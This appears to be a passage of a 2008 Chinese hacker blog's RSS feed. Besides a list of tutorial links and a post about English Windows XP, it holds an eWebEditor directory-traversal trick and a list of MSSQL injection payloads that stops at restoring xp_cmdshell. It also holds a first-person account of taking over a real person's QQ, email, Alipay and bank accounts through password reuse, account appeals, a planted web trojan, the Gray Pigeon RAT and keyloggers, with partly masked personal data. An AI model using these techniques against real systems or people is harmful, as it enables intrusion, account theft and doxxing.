42. 一学就会魔法书－中文flash动画制作 <a TITLE="http://www.it270.com/topics/0000000173/" HREF="http://www.it270.com/topics/0000000173/" TARGET="_blank">http://www.it270.com/topics/0000000173/</A><br/>
43. 《基于WEB程序设计基础》浙江大学 - 胡晓军 <a TITLE="http://www.it270.com/topics/0000000171/" HREF="http://www.it270.com/topics/0000000171/" TARGET="_blank">http://www.it270.com/topics/0000000171/</A><br/>
44. IT电子教育门户JAVA-web培训视频教程 <a TITLE="http://www.it270.com/topics/0000000170/" HREF="http://www.it270.com/topics/0000000170/" TARGET="_blank">http://www.it270.com/topics/0000000170/</A><br/>
45. Adobe InDesign CS2 中文版经典教程 <a TITLE="http://www.it270.com/topics/0000000169/" HREF="http://www.it270.com/topics/0000000169/" TARGET="_blank">http://www.it270.com/topics/0000000169/</A><br/>
46. 精典dos实用技术配套魔法光盘 <a TITLE="http://www.it270.com/topics/0000000211/" HREF="http://www.it270.com/topics/0000000211/" TARGET="_blank">http://www.it270.com/topics/0000000211/</A><br/>
47. 电脑组装完全DIY手册 <a TITLE="http://www.it270.com/topics/0000000212/" HREF="http://www.it270.com/topics/0000000212/" TARGET="_blank">http://www.it270.com/topics/0000000212/</A><br/>
48. 电脑原理与拆装视频教程 <a TITLE="http://www.it270.com/topics/0000000213/" HREF="http://www.it270.com/topics/0000000213/" TARGET="_blank">http://www.it270.com/topics/0000000213/</A><br/>
49. 电脑翻拍照片技术精粹 <a TITLE="http://www.it270.com/topics/0000000214/" HREF="http://www.it270.com/topics/0000000214/" TARGET="_blank">http://www.it270.com/topics/0000000214/</A><br/>
50. 磁盘阵列安装视频教程 <a TITLE="http://www.it270.com/topics/0000000215/" HREF="http://www.it270.com/topics/0000000215/" TARGET="_blank">http://www.it270.com/topics/0000000215/</A><br/></DIV>
]]></description>
            <author>Хакеры</author>
            <category>资源共享</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087fn.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 13:45:14 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087fn.html</guid>
        </item>
        <item>
            <title>ewebeditor遍历路径漏洞</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087em.html</link>
            <description><![CDATA[<div>&nbsp;ewebeditor/admin_uploadfile.asp?id=14<br/>
在id=14后面添加&amp;dir=..<br/>
再加 &amp;dir=../..<br/>
&amp;dir=http://www.cnblogs.com/../..
看到整个网站文件了<br/></DIV>
]]></description>
            <author>Хакеры</author>
            <category>技术文章</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087em.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 12:43:52 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087em.html</guid>
        </item>
        <item>
            <title>装了个英文XP，感觉不错，呵呵！</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087eh.html</link>
            <description><![CDATA[<div>
&nbsp;最近想提高下英语，弄了个英文XP，感觉比中文版的要好，都说原版的兼容性好，正好来测试下，附上几个截图，嘿嘿！</DIV>
<div>
<table CLASS="list01" STYLE="TABLE-LAYOUT: fixed; WORD-BREAK: break-all; WORD-WRAP: break-word" CELLSPACING="4" CELLPADDING="0" WIDTH="240" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td><a HREF="http://photo.sina.com.cn/photo/5053fe78443492e74368a"><img SRC="http://static11.photo.sina.com.cn/small/5053fe78443492e74368a&amp;000" BORDER="0"></IMG></A></TD>
</TR>
<tr>
<td>
<div CLASS="photo_description02" ID="5053fe78443492e74368a_desc-view" TITLE="点击这里编辑照片描述">
<table CLASS="list01" STYLE="TABLE-LAYOUT: fixed; WORD-BREAK: break-all; WORD-WRAP: break-word" CELLSPACING="4" CELLPADDING="0" WIDTH="240" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td><a HREF="http://photo.sina.com.cn/photo/5053fe78443493038b5d4"><img SRC="http://static5.photo.sina.com.cn/small/5053fe78443493038b5d4&amp;000" BORDER="0"></IMG></A></TD>
</TR>
<tr>
<td>
<div CLASS="photo_description02" ID="5053fe78443493038b5d4_desc-view" TITLE="点击这里编辑照片描述"><br/>
</DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087eh.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 12:21:38 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087eh.html</guid>
        </item>
        <item>
            <title>社会工程学在黑客中的应用－－一个密码引发的“血案”</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087dj.html</link>
            <description><![CDATA[<div>
&nbsp;<strong>说明：文章已发表于黑客X档案2007年第12期，转载请注明出处！</STRONG><br/>

<strong>本文首发邪恶八进制.如需转载请注明出处!</STRONG><br/>
PS:因为事搁很久..有些细节和证据已经无法拿出来了..所有以下有部分是根据我的回忆来陈述的..喜欢社工的朋友边看边想也许就知道我是否在编造故事了..如果你是刚入门对社工并不了解的朋友就暂且把他当成是一个小说来看好了..<br/>

事情起因<br/>
一个偶然的机会..在一次帮助朋友盗一人的QQ的时候..查到此号码是另一人所赠送..也就是她现在的男朋友..通过查看某女QQ空间的留言肯定了QQ号码为198***2就是她男朋友..当时一看跟我QQ一样是生日号..然后就看了下资料上写着"一个退休的重量级黑客".因为某女的QQ位数为5位..而他的又是生日号..又自称是黑客..开始我还不怎么相信..就想我一定要把此生日号和这个5位号弄到手..<br/>

于是就开始了对198***2的调查,当时手里刚好有我们本地一个论坛的服务器权限..而且他又是常上网之人肯定也上此论坛<br/>

就在数据库里执行<br/>
SELECT&nbsp;*&nbsp;FROM&nbsp;[Dv_User]&nbsp;where&nbsp;[userim]&nbsp;like&nbsp;'%198***2%'<br/>

此命令是查询QQ资料包含198***2的所有用户.得到ID两个..宁宁&nbsp;我本有情<br/>

得到MD5加密的密码..<br/>
<a HREF="http://www.cmd5.com/" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">http://www.cmd5.com/</FONT><br/></A><br/>
&nbsp;解出明文密码为553***0<br/>
图1<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 362px" HEIGHT="376" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_8bf0996233b555f.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
用得到的密码登陆论坛..翻看他所有回复过的贴子还有他在论坛和别人发送的短信.也未找到任何有价值的信息<br/>

这个密码不用看就知道是电话号码..很有可能是他家里的电话..刚好我手中有电信的数据..我们本地所有家庭电话只要我知道号码就能查..输入此号码..查到结果..图2<br/>

<br/>
<img HEIGHT="170" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_a272821acd295b7.jpg" WIDTH="309" BORDER="0"></IMG><br/>
&nbsp;<br/>
"陈明新"很有可能是他父亲的名字..这点在之后的调查中经过证实..<br/>
我有一个习惯..无论是哪个QQ我都喜欢从交友中心来看他的资料..因为有些人缺乏安全意识..所以留的资料真实性在80%以上..但是现在直接从Q里看的话..会提示你不是高级用户...有的资料能看..有的会提示..所以我根据部分能看的抓了个包..构造出了个URL..然后根据此URL写了个小程序方便我以后的查询之用..这次也不例外<br/>

图3<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 397px" HEIGHT="412" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_852d9251fbc2955.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
照片..和生日..和一些别的信息就这么容易到手了..也再次确认了.这个QQ绝对是他的生日号.因为他所填的出生年月跟QQ的数字是一样的..因为隐私问题图片我都做了处理..也许大家会说..只根据QQ和所填生日并不能完全肯定他就是这一天出生的人..因为他资料也提到过自己是"黑客"..所以他为了掩饰自己这些资料也许是根据他的QQ来填的..这点我也怀疑过..但在后来的取证中我搞到了他的身份证号..证实了这点.<br/>

在他详细资料个人主页看到这个地址<br/>
<a HREF="http://b/" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">http://b</FONT><br/></A><br/>
**n.51.com/&nbsp;&nbsp;然后打开..用查到的论坛密码尝试着去登陆...很多人都有用一个密码的习惯..而这个所谓的"重量级黑客"也不例外..登陆成功..<br/>

图4<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 394px" HEIGHT="409" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_2a21da7645151a6.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
在他相册里找到了一个非常有价值的信息.<br/>
图5<br/>
<br/>
<img HEIGHT="458" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_b4e3dbf352ad0a5.jpg" WIDTH="327" BORDER="0"></IMG><br/>
&nbsp;<br/>
计算机四级证书..当时看到这个我还以为这家伙真的很牛..不过在后来证实他确实啥也不会..真不知道这个四级证书怎么来的..也许是办的假证.也许是别人替考得来的把..暂且不管那么多<br/>

从此证书扫描件中得到姓名"陈宁"身份证号码:342126198*****0176.这也证明了之前通过密码查询到的"陈明新"跟他很有可能就是父子关系.<br/>

在有了一次密码正确的经历之后我尝试着用553***0这个密码去登陆QQ号..很可惜的是密码错误..既然密码不对..那我就来帮他修改密码..(在我做这些的时候QQ密码找回系统跟现在是不同的..)先来找回密码看下他的密码提问是什么..问题：我叫什么？&nbsp;回答..我就试着写了他的名字"陈宁"提示结果已经发送至安全信箱..但信箱是多少我是不知道的..还是继续搜集资料把<br/>

根据<br/>
<a HREF="http://b/" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">http://b</FONT><br/></A><br/>
**n.51.com/&nbsp;的地址..又找到两个&nbsp;<br/>

<a HREF="http://b/" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">http://b</FONT><br/></A><br/>
**n**2.51.com/&nbsp;&nbsp;<br/>
<a HREF="http://b/" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">http://b</FONT><br/></A><br/>
**n***0.51.com/&nbsp;根据这几个网页注册的信息得到他手机号码为138567****0&nbsp;小灵通0558522***5&nbsp;EMAIL:c***<br/>

<a HREF="mailto:t@ah163.com" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">t@ah163.com</FONT><br/></A><br/>
&nbsp;抱着试一试的心态用得到的密码去登陆邮箱..可惜的是密码错误..<br/>

试下找回密码把...帐号就是c***t生日我们也知道了..顺利通过..当时的提问好象是跟QQ一样的..反正我是修改掉了他的密码..现在操作一下已经被他修改回来了..图6&nbsp;<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 300px" HEIGHT="311" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_03baadf52651fca.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
不过登陆进信箱后并未有看到QQ发来的确认信..<br/>
继续在baidu搜索c***<br/>
<a HREF="mailto:t@ah163.com" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">t@ah163.com</FONT><br/></A><br/>
&nbsp;图7<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 443px" HEIGHT="459" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_decd9e0f3091b05.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
根据图8返回的信息得到他所工作的单位在XX医院..联系电话为0558-51***95传真:0558-55***70<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 239px" HEIGHT="248" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_212e162d65a2797.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
图9上的信息也证实了他确实在XX医院的管理部工作.<br/>
<br/>
<img HEIGHT="525" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_5c994dd402fd0aa.jpg" WIDTH="328" BORDER="0"></IMG><br/>
&nbsp;<br/>
现在我手中已经掌握足够多的信息了..与是我就打算申诉他的QQ..大家也都知道申诉QQ是要知道他的5个之内的好友和历史密码的..历史密码我可以尝试用553***0但是好友我还没有..于是乎就在他QQ空间和QQ相册逛了一圈..选择了他留言里的几个好友..证件号码就用我之前得到的身份证号码..姓名也是用他自己的名字..只是申诉的结果发到了我的EMAIL里..&nbsp;到了晚上后进EMAIL看了下...结果已经出来了...申诉成功..当时激动了一把..赶紧修改了密码登陆他的QQ<br/>

在QQ网络硬盘里找到一些文件..&nbsp;图10&nbsp;&nbsp;<br/>

<br/>
<img HEIGHT="225" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_8f0ec6cda32765e.jpg" WIDTH="309" BORDER="0"></IMG><br/>
&nbsp;<br/>
这家伙貌似还是个公安.之前查到的又是在某医院管理部..不知道他到底有多少个工作了..<br/>

通过翻看他信箱里的一些信件又找到另外一个EMAIL地址b**n5*<br/>
<a HREF="mailto:1@126.com" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">1@126.com</FONT><br/></A><br/>
..因为是taobao发来的信件..这个EMAIL很有可能是支付宝帐户..<br/>
我来看一下关于此EMAIL的一些信息把<br/>
<a HREF="https://www.alipay.com/trade/i_credit.do?email=b" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">https://www.alipay.com/trade/i_credit.do?email=b</FONT><br/>
</A><br/>
**n5*<br/>
<a HREF="mailto:1@126.com" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">1@126.com</FONT><br/></A><br/>
图11<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 337px" HEIGHT="350" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_8d9161279a1c86e.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
又得到真实姓名"陈宁"..那么多的证据也表明了他的真实姓名确实是叫"陈宁"了..一般我在得到某人EMAIL时总喜欢用支付宝去查下看能否得到其真实姓名..在我跟好几个好友聊天时他们都很纳闷我是如何得到他们真实姓名和生日的..相信看了本文的你以后也知道怎么去做这些了<br/>

在拿4199病毒作者来做下演示把..他的资料我也是调查了不少时间..已经在4199病毒贴吧公布了<br/>

因为性质不同所以这里图片和信息就不做处理了<br/>
<a HREF="https://www.alipay.com/trade/i_credit.do?email=mengqiu_xu@126.com" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">https://www.alipay.com/trade/i_credit.do?email=mengqiu_xu@126.com</FONT><br/>
</A><br/>
图12<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 349px" HEIGHT="362" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_ea9f4d684f40469.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
到这里关于他的调查已经告一段落了..QQ也已经到手了..然后刚好朋友让我帮忙搞的那个5位的QQ4***3也在线..就跟她聊了起来..试图欺骗她.又赶紧做了个网页木马..做了下伪装..因为两者是恋人关系..我就说是我的爱情表白..送给她的礼物...可惜的是我有些太心急了..还没有了解她使用的什么杀毒软件..而且木马也没有做免杀处理..她来了一句有病毒..我只好说不好意思..我发错了..也许这一鲁莽的举动已经引起了她的怀疑..我就赶紧下线了..<br/>

第二天发现密码被找回去了.而且密码保护也被修改为..我喜欢谁?因为之前查到的三个51.com主页..有他写的日记..得到此女名字为"王鹃".试着找回一下..哈..运气真好..提示发送到安全信箱..可是信箱是多少还是不知道..我还是继续申诉把..到了下午..信箱收到一封腾讯的确认信..赶紧修改了密码上去..丫的资料也改了..在骂谁盗他的号...我也帮他修改了一下.."这就是你所谓的重量级黑客?"然后给QQ为4***3的又发了一个页面说这次做好了..绝对没毒..就下线了...过了一天..我又试图登陆的时候发现密码又被改了..我就又把他的号申诉了回来...就这样来回的我申诉..然后他找回..申诉成功了四次之后..我有点纳闷了...究竟他是怎么找回去那么快的...<br/>

而事情进展到此时..我那朋友跟QQ4***6也和好了..也不要求盗她号了..而我也已经玩够了..就加了QQ198***2问他是怎么那么快把QQ找回的,<br/>

这家伙就说他是腾讯技术主管..无论我怎么盗他的号都是没用的..而且还说他为腾讯远程打工..一天工资500元..我又问他在公安局是做什么的..他说自己是网警..然后我问他是怎么做的网警.他就说在2005年他入侵了我们本地电信局盗了所有的ADSL用户去刷泡泡堂点卷..使电信局损失几百万..后来的一天他自己喝多了酒投案自首了...开始我还真信了...然后我们两个做了朋友..每天就聊些技术上的事..但郁闷的事..每当我问他什么的时候他都避而不答...有时候回答的很慢..答应也不尽人意..<br/>

当时我和nowthk(可惜的是nowthk已经被抓了)两人黑了一些游戏箱子..那时候都在玩一个武林外传的游戏..刚好这个"陈宁"也在跟我玩一个区...我就告诉他我盗了好多这个区的游戏帐号..装备和钱不用愁...开始还好..我只给他一些帐号让他自己去扒..后来他生日..请我去吃饭..我也就去了..之后的几天就经常找我出来吃饭啊什么的..当面问我是怎么盗的..我就相信他把箱子的后台和密码给了他...没几天nowthk就问我..是不是我动了别的区的游戏号了..我就说我没有啊...他就说奇怪了..他合作的那个买家登陆的号都被人洗过了的..密码就我们三个人知道..于是我对他起了怀疑..问他也不承认...在加上之前讨论技术避而不答..我决定在对他进行次调查..<br/>

首先我用EST内部的一个漏洞利用做了个网马..(无敌的老婆mika写的)<br/>
图13<br/>
<br/>
<img HEIGHT="224" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_c44bf0ec257b58c.jpg" WIDTH="492" BORDER="0"></IMG><br/>
&nbsp;<br/>
当时自己测试是中马的..然后用webshell登陆在箱子登陆处加了个iframe.接着他找我要登陆密码..我就给了他个假的密码...没多久后.灰鸽子提示有主机上线..他中马了.<br/>

打开灰鸽子的远程监控..这家伙还在继续猜密码..完全不知道已经被我控制了..以前一直听他吹..这次我恶搞下他..首先打开了他视频..哈.被他发现了..盯着我看..然后控制了他鼠标..没多久他就发来信息说电脑被人入侵了..我假装不知道的问他.不会把..你那么牛谁敢入侵你.他当时正好跟一个浙江的MM在聊天..就随口告诉我说浙江的..还说自己开着追踪器..谁入侵他都知道..可他完全不知道这一切都在我的监视之下并被我截了图<br/>

图14<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 351px" HEIGHT="364" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_fc926efde6b269c.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
之后我当然想见识下这么牛比的追踪器了.只见他从skynet下载了一个追踪器.下载地址为<br/>

<a HREF="http://users.skynet.be/submissionz03/ntp325.zip" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">http://users.skynet.be/submissionz03/ntp325.zip</FONT><br/>
</A><br/>
这一切当然也逃不出灰鸽子的监控<br/>
图15<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 344px" HEIGHT="357" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_77694d82bdda9bc.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
下载完毕后他把文件名修改为"追踪器.zip"之后发给了我..说自己先去WC..用监视看到他还在继续猜那个后台密码..真够辛苦的.<br/>

图16<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 376px" HEIGHT="390" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_7ab97f6b61692da.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
既然这么牛比的追踪器到手了..我怎么着也得看下是什么东西把..不然也对不起这个"重量级黑客"的劳动成果啊<br/>

图17<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 362px" HEIGHT="376" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_17e19488f26e189.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
软件的使用和介绍我就不说了.不知道的google下...<br/>
在之后的几天监视中..发现箱子里的信确实是他动的..并且在5173.com拍卖&nbsp;与是我启动了灰鸽子的键盘记录..<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 217px" HEIGHT="225" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_1edb885062cf0e2.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
图18是鸽子记录下的<br/>
5173.com的用户名是b**n密码同样是553***0<br/>
登陆看下是否正确图19<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 521px" HEIGHT="540" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_8569646f48d9dd5.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
因为我不能每天就这么监视着他..所以为了方便.我又上传了一个别的键盘记录..自动在他C盘生成个文件并保存所有的击键记录.<br/>

几天后查看击键记录发现这家伙在腾讯照片系统投简历&nbsp;图20<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 351px" HEIGHT="364" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_0314f277ae49de8.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
怪不得开始跟我说是腾讯技术主管..投了简历后再发给我看..图中又一次暴露了他的身份证号.&nbsp;<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 189px" HEIGHT="196" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_57d51512456ac3a.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
图21是他在腾讯照片系统的用户名和密码.其中138567***10是他本人的手机号(这点在第一次的调查中也已经得到)<br/>

我在此前已经得到他支付宝帐号为b**n5*<br/>
<a HREF="mailto:1@126.com" TARGET="_blank"><br/>
<font COLOR="#2F5FA1">1@126.com</FONT><br/></A><br/>
.那就来用那个553***0登陆下taobao看看密码对不对把<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 309px" HEIGHT="321" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_2ada3a750e07281.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
图22&nbsp;登陆成功..又是这个白痴密码..它的功劳可够大的..&nbsp;用过taobao的应该都知道支付宝是跟银行帐户绑定在一起的..继续追下去没准能搞到他银行信息呢..登陆支付宝把..这个密码是不对了..可他提供了个找回密码的功能..图23&nbsp;<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 376px" HEIGHT="390" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_b927765f1f95e4a.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
可惜这个回答不对&nbsp;图24<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 337px" HEIGHT="350" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_b45b75730c283c7.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
不过这个错误提示可帮了我大忙"如果您忘记了安全保护问题答案，请点击&nbsp;输入证件号&nbsp;"<br/>

我在换一种方式找回.因为我已经知道他的身份证号码..试下看对不对把..图25&nbsp;&nbsp;26密码找回成功并发送至信箱.<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 271px" HEIGHT="281" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_7d230c5ac5c92fa.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 234px" HEIGHT="243" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_1eb5e8276da3396.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
信箱密码现在是不知道的..一样用密码提示找回..这次他的提问也是我叫什么?回答.."陈宁"不对..就随手试了下"宁宁".(后来我又用这个回答试了下taobao的也一样成功)成功修改掉密码&nbsp;用修改掉的密码登陆信箱&nbsp;<br/>

图27<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 316px" HEIGHT="328" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_12527550ac1f663.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
用信箱中的连接修改掉登陆密码..同样的方法找回支付宝支付密码&nbsp;图28<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 391px" HEIGHT="406" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_2ca97230e2f7332.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
登陆后查看支付宝帐户信息&nbsp;图29&nbsp;很可惜的是银行信息看不到<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 361px" HEIGHT="375" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_3d4b9bde944e1ca.jpg" WIDTH="518" BORDER="0"></IMG><br/>
&nbsp;<br/>
别忘了我们还有一个5173的没有利用..用5173卖过游戏装备的应该都知道..交易金额达到一定数目的时候,自己是可以申请提现的..在他以前提现的记录中得到他银行卡号为"9558801311******106"<br/>

下面就是要弄到他银行密码了..通过灰鸽子远程监控知道他的密码是7位的,,工行的密码必须是数字和字母组合的..这次完全是靠猜了..已经得到他那么多信息想猜出密码也不是个难事..猜解了几次之后..猜出密码为"b**n**2"...他的ID加生日.&nbsp;也是他在武林外传游戏中的游戏帐号..武林外传的游戏密码也被我搞到了..不过我之前也未提到..<br/>

看看银行成功登陆后的截图把!&nbsp;图30&nbsp;<br/>

<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 538px" HEIGHT="550" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_6ed1dd249f99ba6.jpg" WIDTH="511" BORDER="0"></IMG><br/>
&nbsp;<br/>
事情到这里也算告一段落了..我们得到的有他的姓名,生日,手机,电话,工作单位,EMAIL..父亲姓名.几个51的帐号和密码..5173的帐号..支付宝..银行帐号和密码...也算是不小的收获了..<br/>

事隔很久后因为一些别的事..我两又吵了起来..这次我把我调查的结果全发给他了..估计他也挺郁闷的把..之前我一直装不知道他的底细并跟他保持距离..发给他那些截图和证据之后这家伙也无话可说了<br/>

图31&nbsp;&nbsp;32<br/>
<br/>
<img STYLE="WIDTH: 500px; HEIGHT: 291px" HEIGHT="302" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_29c70cfd70a5e7e.jpg" WIDTH="518" BORDER="0"></IMG><br/>
<br/>
<img STYLE="CURSOR: hand" HEIGHT="439" ALT="按此在新窗口打开图片" SRC="https://forum.eviloctal.com/attachment/Mon_0712/10_947_08ba5eb799b8c0c.jpg" WIDTH="417" BORDER="0"></IMG><br/>
&nbsp;&nbsp;<br/>
相信看完本文后的你一定感到非常的不可思议..其实完成整个社工过程也完全是因为其本人使用同一个密码所造成的..就因为是如此弱智的密码.所以我才那么顺利的搞到他所有的密码.当然社会工程学所带来的危害还不仅是这些..<br/>
</DIV>
]]></description>
            <author>Хакеры</author>
            <category>转载美文</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087dj.html#comment</comments>
            <pubDate>Wed, 09 Jan 2008 11:14:32 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087dj.html</guid>
        </item>
        <item>
            <title>常用的一些注入命令</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087di.html</link>
            <description><![CDATA[<div>&nbsp;//看看是什么权限的<br/>
and&nbsp;1=(Select&nbsp;IS_MEMBER('db_owner'))<br/>

And&nbsp;char(124)%2BCast(IS_MEMBER('db_owner')&nbsp;as&nbsp;varchar(1))%2Bchar(124)=1&nbsp;;--<br/>

<br/>
//检测是否有读取某数据库的权限<br/>
and&nbsp;1=&nbsp;(Select&nbsp;HAS_DBACCESS('master'))<br/>

And&nbsp;char(124)%2BCast(HAS_DBACCESS('master')&nbsp;as&nbsp;varchar(1))%2Bchar(124)=1&nbsp;--<br/>

<br/>
<br/>
数字类型<br/>
and&nbsp;char(124)%2Buser%2Bchar(124)=0<br/>
<br/>
字符类型<br/>
'&nbsp;and&nbsp;char(124)%2Buser%2Bchar(124)=0&nbsp;and&nbsp;''='<br/>

<br/>
搜索类型<br/>
'&nbsp;and&nbsp;char(124)%2Buser%2Bchar(124)=0&nbsp;and&nbsp;'%'='<br/>

<br/>
爆用户名<br/>
&nbsp;and&nbsp;user&gt;0<br/>
'&nbsp;and&nbsp;user&gt;0&nbsp;and&nbsp;''='<br/>

<br/>
检测是否为SA权限<br/>
and&nbsp;1=(select&nbsp;IS_SRVROLEMEMBER('sysadmin'));--<br/>

And&nbsp;char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)&nbsp;as&nbsp;varchar(1))%2Bchar(124)=1&nbsp;--<br/>

<br/>
检测是不是MSSQL数据库<br/>
and&nbsp;exists&nbsp;(select&nbsp;*&nbsp;from&nbsp;sysobjects);--&nbsp;<br/>

<br/>
检测是否支持多行<br/>
;declare&nbsp;@d&nbsp;int;--&nbsp;<br/>

<br/>
恢复&nbsp;xp_cmdshell<br/>
